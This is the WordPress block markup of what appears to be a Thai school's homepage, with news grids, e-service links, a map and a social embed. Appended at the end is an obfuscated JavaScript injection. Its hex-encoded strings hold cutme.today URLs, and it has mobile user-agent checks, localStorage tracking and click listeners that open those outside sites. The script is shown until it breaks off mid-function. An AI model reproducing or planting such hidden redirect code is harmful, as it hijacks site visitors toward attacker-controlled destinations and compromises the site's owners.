900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const 